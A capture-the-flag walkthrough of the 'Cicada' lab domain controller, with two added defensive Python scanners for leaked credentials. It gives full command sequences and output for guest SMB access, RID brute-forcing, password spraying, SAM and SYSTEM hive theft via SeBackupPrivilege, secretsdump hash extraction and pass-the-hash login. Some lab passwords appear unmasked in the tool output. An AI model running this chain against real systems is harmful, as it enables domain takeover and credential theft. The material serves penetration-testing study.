Cicada
Hello everyone, hope you're doing great. This machine is all about enumeration: if you enumerate carefully and keep things simple, you won't have any problem solving it. First, we run Nmap against all ports with the default scripts, service version detection and OS detection, saving the results in all output formats to a file named cicadaNMAP, with verbose output so we can follow progress while it scans.
nmap -p- -sCV -O -oA cicadaNMAP 10.10.11.35 -vvv
SMB
SMB NULL session authentication worked at first, but enumerating shares or users with it returned STATUS_ACCESS_DENIED. The guest account, however, was not disabled :) and with it we could read a share named HR, though we still couldn't enumerate users.
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
Utilizing the spider_plus module allowed me to list all the files from readable shares.
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --shares -M spider_plus
[+] Saved share-file metadata to "/home/legend/.nxc/modules/nxc_spider_plus/10.10.11.35.json".
[*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
[*] SMB Readable Shares: 2 (HR, IPC$)
[*] SMB Filtered Shares: 1
[*] Total folders found: 0
[*] Total files found: 1
[*] File size average: 1.24 KB
[*] File size min: 1.24 KB
[*] File size max: 1.24 KB
{
  "HR": {
    "Notice from HR.txt": {
      "atime_epoch": "2024-08-28 13:31:48",
      "ctime_epoch": "2024-03-14 08:29:03",
      "mtime_epoch": "2024-08-28 13:31:48",
      "size": "1.24 KB"
    }
  }
}
Download all files from the readable shares with -o DOWNLOAD_FLAG=True:
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
[*] Downloads successful: 1
[+] All files processed successfully.
➜ Cicada cp /home/legend/.nxc/modules/nxc_spider_plus/10.10.11.35/HR/Notice\ from\ HR.txt .
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team.
As part of our security protocols, it's essential that you change
your default password to something unique and secure.
Your default password is: Cicada$M6Cor*REDACTED*
...SNIP...
Now we have a password to spray, but no user list. LDAP isn't usable for us here, but SMB lets us enumerate users by brute-forcing RIDs:
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
[*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
[+] cicada.htb\guest:
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
...SNIP...
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
To create a user list:
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
Spraying that password against the user list gives us a hit:
➜ Cicada nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Cor*REDACTED*' --continue-on-success
[+] cicada.htb\michael.wrightson:Cicada$M6Cor*REDACTED*
We have read permission on NETLOGON and SYSVOL, but there is nothing useful in them. So let's check whether any user description contains interesting data.
➜ Cicada nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Cor*REDACTED*' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
We find a password in David's account description:
➜ Cicada nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6C*REDACTED*' --users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.35 445 CICADA-DC Administrator 2024-08-26 20:08:03 2 Built-in account for administering the computer/domain
SMB 10.10.11.35 445 CICADA-DC Guest 2024-08-28 17:26:56 2 Built-in account for guest access to the computer/domain
SMB 10.10.11.35 445 CICADA-DC krbtgt 2024-03-14 11:14:10 2 Key Distribution Center Service Account
SMB 10.10.11.35 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 2
SMB 10.10.11.35 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 2
SMB 10.10.11.35 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.10.11.35 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$L*REDACTED*
SMB 10.10.11.35 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated 8 local users: CICADA
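As a defender's check built on the same output, here is an added Python example (not part of the original writeup) that parses the user table nxc prints for --users and flags descriptions that look like they carry a credential. The sample lines are constructed: the host and domain match the box, but the descriptions and values in them are made up.

```python
import re

# Constructed sample in the layout nxc prints for `smb ... --users` (the host
# and domain names match the writeup; the descriptions and values are made up).
SAMPLE_OUTPUT = """\
SMB  10.10.11.35  445  CICADA-DC  Administrator   2024-08-26 20:08:03  2  Built-in account for administering the computer/domain
SMB  10.10.11.35  445  CICADA-DC  john.smoulder   2024-03-14 12:17:29  2
SMB  10.10.11.35  445  CICADA-DC  david.orelious  2024-03-14 12:17:29  1  Just in case I forget my password is EXAMPLE-not-real
SMB  10.10.11.35  445  CICADA-DC  svc_backup      2024-01-02 09:00:00  0  Service account, pwd: Changeme123
SMB  10.10.11.35  445  CICADA-DC  emily.oscars    2024-08-22 21:20:17  1  Passes reviews for HR
"""

# One user line: tool, host, port, hostname, username, last-pw-set, bad-pw count, free-text description.
USER_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)\s*(?P<desc>.*)$"
)

# A credential keyword followed within a few words by "is", ":" or "=" and then a value.
LEAK_PATTERN = re.compile(
    r"\b(password|passwd|pwd|pass|pw|secret)\b[^:=]{0,20}?(?:\bis\b|[:=])\s*(\S+)",
    re.IGNORECASE,
)


def parse_users(text):
    """Return [(username, description), ...] for every user line in the nxc output."""
    rows = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if m:
            rows.append((m.group("user"), m.group("desc").strip()))
    return rows


def find_description_leaks(text):
    """Return [(username, suspected_value), ...] for descriptions that appear to hold a credential."""
    findings = []
    for user, desc in parse_users(text):
        m = LEAK_PATTERN.search(desc)
        if m:
            findings.append((user, m.group(2)))
    return findings


if __name__ == "__main__":
    for user, value in find_description_leaks(SAMPLE_OUTPUT):
        print(f"[!] {user}: description appears to contain a credential ({value})")
```

Run it periodically against your own domain controller output and treat any hit as a password reset plus a cleanup of the description attribute.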
David has read permission on the DEV share, and it contains a backup script.
➜ Cicada nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp*REDACTED*' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
{
  "DEV": {
    "Backup_script.ps1": {
      "atime_epoch": "2024-08-28 13:28:22",
      "ctime_epoch": "2024-03-14 08:31:38",
      "mtime_epoch": "2024-08-28 13:28:22",
      "size": "601 B"
    }
  }
}
cp /home/legend/.nxc/modules/nxc_spider_plus/10.10.11.35/DEV/Backup_script.ps1 .
We found credentials for Emily that we can use.
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp*REDACTED*" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
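To catch this class of finding before an attacker does, here is an added Python example (not from the writeup or the box) that scans a PowerShell script pulled from a share for credential literals such as the ConvertTo-SecureString ... -AsPlainText pattern in Backup_script.ps1 above. The embedded script is a constructed sample and every value in it is a placeholder.

```python
import re

# Constructed sample modelled on the Backup_script.ps1 pattern above; every
# value in it is a placeholder, not a credential from the box.
SAMPLE_SCRIPT = """\
$sourceDirectory = "C:\\smb"
$username = "emily.oscars"
$password = ConvertTo-SecureString "PLACEHOLDER-not-the-real-value" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$apiKey = 'sk-example-0000'
# Better: prompt or read from a secret store instead of embedding a literal
$safeCred = Get-Credential
Compress-Archive -Path $sourceDirectory -DestinationPath "D:\\Backup\\out.zip"
"""

# (rule name, regex) pairs; each regex captures the literal in a group named "val".
PATTERNS = [
    ("plaintext SecureString",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<val>[^'\"]+)\1\s+-AsPlainText", re.I)),
    ("secret-named variable assigned a literal",
     re.compile(r"\$(\w*(?:pass|pwd|secret|token|apikey|key)\w*)\s*=\s*(['\"])(?P<val>[^'\"]+)\2", re.I)),
    ("-Password literal argument",
     re.compile(r"-Password\s+(['\"])(?P<val>[^'\"]+)\1", re.I)),
]


def mask(value):
    """Keep the first two characters so a reviewer can recognise the value without reprinting it."""
    return value[:2] + "*" * (len(value) - 2)


def scan_script(text, name="<script>"):
    """Return [(name, line_no, rule, masked_value), ...] for lines that embed a credential literal."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # PowerShell comment line
        for rule, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((name, no, rule, mask(m.group("val"))))
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for name, no, rule, value in scan_script(SAMPLE_SCRIPT, "Backup_script.ps1"):
        print(f"[!] {name}:{no} {rule}: {value}")
```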
Emily has write permission on C$, so we can probably get remote access to the DC.
➜ Cicada nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp*REDACTED*' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ READ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ READ,WRITE Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
We have local admin privilege on CICADA-DC.
➜ Cicada nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
Like sudo -l on Linux boxes, we run whoami /priv to see which privileges we hold. We have SeBackupPrivilege and SeRestorePrivilege, which let us save the SAM and SYSTEM hives and recover the Administrator hash from them.
➜ Cicada evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp*REDACTED*'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
Dump the hashes:
➜ Cicada secretsdump.py -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20250320.12616.e61ff5d - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c9*REDACTED*:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
➜ Cicada evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c9*REDACTED*
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop; type root.txt
cb60fc11ba4e*REDACTED*